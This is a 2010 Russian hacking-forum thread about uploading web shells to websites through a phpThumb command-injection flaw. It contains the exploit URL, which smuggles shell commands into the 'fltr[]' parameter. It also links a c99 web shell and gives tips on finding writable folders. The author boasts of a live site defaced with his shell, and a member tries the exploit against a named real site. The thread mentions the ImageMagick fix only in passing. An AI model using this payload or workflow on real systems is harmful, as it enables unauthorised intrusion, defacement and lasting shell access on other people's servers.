"Детский взлом" или простейшее залитие шелла

Discussion in 'Видео-Конкурс [лето 2010]' started by Godfather Bulan, 31 Jul 2010.

  1. Godfather Bulan

    Godfather Bulan Elder - Старейшина

    Joined:
    18 Mar 2008
    Messages:
    172
    Likes Received:
    443
    Reputations:
    25
    Видюшка
    http://www.youtube.com/watch?v=aKnrhIkPCqg
    http://slil.ru/29520436

    Атакуем через phpThumb

    Видео не претендует на звание "ПОБЕДИТЕЛЬ!" Просто для !начинающих! и школоты. Ну и еще чисто поржать :)
    Все достаточно просто.

    http://www.securityfocus.com/bid/39605/

    Эксплоит, прямые руки, чутка смекалки и у нас куча шеллов :)

    Удачного дня!

    p.s Еще раз повторю, способ на видео чрезвычайно простой. Мне еще повезло с правами на запись в папку. Обычно приходится еще и искать папку с правами на запись или портить зрение с выводом не в текстовом виде, а картинкой с красными буквами на розовом фоне =\
     
    #1 Godfather Bulan, 31 Jul 2010
    Last edited: 31 Jul 2010
    4 people like this.
    1. BrainDeaD

      BrainDeaD Elder - Старейшина

      Joined:
      9 Jun 2005
      Messages:
      774
      Likes Received:
      292
      Reputations:
      214
      всё равно интересно. наглядный пример применения сплоита и заливка шелла. чётко и ясно.
       
      1 person likes this.
      1. оlbaneс

        оlbaneс Moderator

        Joined:
        5 Nov 2007
        Messages:
        1,381
        Likes Received:
        1,099
        Reputations:
        356
        все глаза сломал. через 20 секунд выключил
         
        _________________________
        1. Godfather Bulan

          Godfather Bulan Elder - Старейшина

          Joined:
          18 Mar 2008
          Messages:
          172
          Likes Received:
          443
          Reputations:
          25
          Я выложил ссылку на сплоит + я утром просил лило не постить сюда это. Ну да ладно, пускай будет.
          там есть галочка с параметром "качество"
           
          #4 Godfather Bulan, 31 Jul 2010
          Last edited: 31 Jul 2010
          1. gibson

            gibson Elder - Старейшина

            Joined:
            24 Feb 2006
            Messages:
            391
            Likes Received:
            247
            Reputations:
            88
            если не трудно выложить видео для скачивания.
             
            1. Godfather Bulan

              Godfather Bulan Elder - Старейшина

              Joined:
              18 Mar 2008
              Messages:
              172
              Likes Received:
              443
              Reputations:
              25
              Готово
               
              1. Lilo

                Lilo Banned

                Joined:
                10 Mar 2009
                Messages:
                462
                Likes Received:
                784
                Reputations:
                313
                я ничего и не постил.
                я как рыба,дальше меня ни куда.

                видос хороший ++
                 
                1. Godfather Bulan

                  Godfather Bulan Elder - Старейшина

                  Joined:
                  18 Mar 2008
                  Messages:
                  172
                  Likes Received:
                  443
                  Reputations:
                  25
                  этот способ еще хорош тем, что не трогаешь основу сайта.
                  http://www.starcorner.ru/

                  Вроде ничего такого-то(скулей, хсс, да и пыхи толком-то нет!) и нет.... Тогда откуда тут ЧВ? :)
                  Дефейсил не я, но шелл мой. К конкурсу сайт не относится


                  Лило, ну ты понел. В аське отписал уже
                   
                  #8 Godfather Bulan, 31 Jul 2010
                  Last edited: 31 Jul 2010
                  1. lukmus

                    lukmus Elder - Старейшина

                    Joined:
                    18 Nov 2009
                    Messages:
                    408
                    Likes Received:
                    118
                    Reputations:
                    23
                    мне нравится, может я в лесу живу но я не слышал о таком сплойте, для меня позновательно.
                    P.S. если у тебя шелл не приватный, выложи пожалуйста
                     
                    1. Godfather Bulan

                      Godfather Bulan Elder - Старейшина

                      Joined:
                      18 Mar 2008
                      Messages:
                      172
                      Likes Received:
                      443
                      Reputations:
                      25
                      На видео
                      http://madnet.name/files/download/9_c99madshell.php

                      А вообще wso больше нравится. респект oRb`у.
                       
                      1. Godfather Bulan

                        Godfather Bulan Elder - Старейшина

                        Joined:
                        18 Mar 2008
                        Messages:
                        172
                        Likes Received:
                        443
                        Reputations:
                        25
                        Еще такая пометочка:
                        Если выдает ошибку, попробуйте указать путь до реальной картинки на сервере.
                        Если все таки выдало список файлов и папок, но шелл не льется - в большинстве случаев нужно искать папку для записи. Например папка uploads или смотрите установленные форумы, движки и etc, читайте инструкцию по установке и найдете где какие права на папки рекомендуют ставить.
                        Если знаете, или хотите найти такую папку, то вот вам команда
                        Первая часть это полный путь до папки на сервере (в начале дебага путь пишется, что, кстати, тоже очень полезно), ну а вторая путь до шелла.


                        Еще бывает, что вообще ничего не отображается или отображается большая белая картинка - все равно попробуйте залить. У меня так прокатывало несколько раз.

                        И не забывайте обращать внимание на чувствительность к символам. Т.е. если скрипт переименовали в phpthumb.php (Т маленькая), то начало сплоита тоже должно быть таким же.
                         
                        #11 Godfather Bulan, 6 Aug 2010
                        Last edited: 6 Aug 2010
                        1. Godfather Bulan

                          Godfather Bulan Elder - Старейшина

                          Joined:
                          18 Mar 2008
                          Messages:
                          172
                          Likes Received:
                          443
                          Reputations:
                          25
                          ах да. Я совсем забыл сказать... фикс этой баги - отключение ImageMagick
                           
                          4 people like this.
                          1. legaljo

                            legaljo Member

                            Joined:
                            27 Jul 2010
                            Messages:
                            195
                            Likes Received:
                            26
                            Reputations:
                            7
                            понравилось
                             
                            1. cheater_man

                              cheater_man Member

                              Joined:
                              13 Nov 2009
                              Messages:
                              651
                              Likes Received:
                              44
                              Reputations:
                              7
                              что за лажа
                              [​IMG]
                              сплоит такой:

                              phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9

                              здесь нужно вместо example.com вставлять атакуемый сайт?
                               
                              1. Godfather Bulan

                                Godfather Bulan Elder - Старейшина

                                Joined:
                                18 Mar 2008
                                Messages:
                                172
                                Likes Received:
                                443
                                Reputations:
                                25
                                phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/site.com/public_html/kartinka.jpg" jpeg:"/home/site.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9


                                & это &
                                 
                                1. fl00der

                                  fl00der Moderator

                                  Joined:
                                  17 Dec 2008
                                  Messages:
                                  1,026
                                  Likes Received:
                                  311
                                  Reputations:
                                  86
                                  Че-то у меня не выходит:
                                  _аhart.com.au/thumbnail/phpThumb.php?src=/images/project/Sutherland_Contemporary.jpg&fltr[]=blur|5 -quality 75 -interlace line "/images/project/Sutherland_Contemporary.jpg" jpeg:"/images/project/Sutherland_Contemporary.jpg";ls -la
                                  (Первую букву в названии заменить на английскую a).
                                  Тупо отображает эту картинку да и все. А на все эти потуги с коммандами срет, как видно.
                                  На многих сайтах такая же фигня.
                                   
                                  _________________________
                                  #16 fl00der, 12 Aug 2010
                                  Last edited: 12 Aug 2010
                                  1 person likes this.
                                  1. brutos

                                    brutos Member

                                    Joined:
                                    25 Nov 2009
                                    Messages:
                                    123
                                    Likes Received:
                                    27
                                    Reputations:
                                    8
                                    А потому что ты основную команду вывода результата - debug - дел куда-то.
                                    Вот так должно быть:
                                    ... ; ls -la ;&phpThumbDebug=9
                                     
                                    1 person likes this.
                                    1. fl00der

                                      fl00der Moderator

                                      Joined:
                                      17 Dec 2008
                                      Messages:
                                      1,026
                                      Likes Received:
                                      311
                                      Reputations:
                                      86
                                      Упс, спасибо!
                                      Мда че-то все равно ***:
                                      thumbnail/phpThumb.php?src=/images/project/Sutherland_Contemporary.jpg&fltr[]=blur|5 -quality 75 -interlace line "/images/project/Sutherland_Contemporary.jpg" jpeg:"/images/project/Sutherland_Contemporary.jpg";ls -la;&phpThumbDebug=9
                                      При этом выкидывает Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 700 bytes). А при других значениях Debug вообще тупо выдает конфигурацию PHPThumb'а, как я понял.
                                       
                                      _________________________
                                      1. shell_c0de

                                        shell_c0de Hack All World

                                        Joined:
                                        7 Jul 2009
                                        Messages:
                                        1,198
                                        Likes Received:
                                        619
                                        Reputations:
                                        690
                                        за каждый паблик сплойт будем теперь видео снимать и обсуждать =\
                                         
                                        _________________________
                                        1. DiplomatQ

                                          DiplomatQ Elder - Старейшина

                                          Joined:
                                          4 Jun 2008
                                          Messages:
                                          48
                                          Likes Received:
                                          5
                                          Reputations:
                                          1
                                          Спасибо, за видео. Только уж совсем не надо разжевывать, что amp это & например))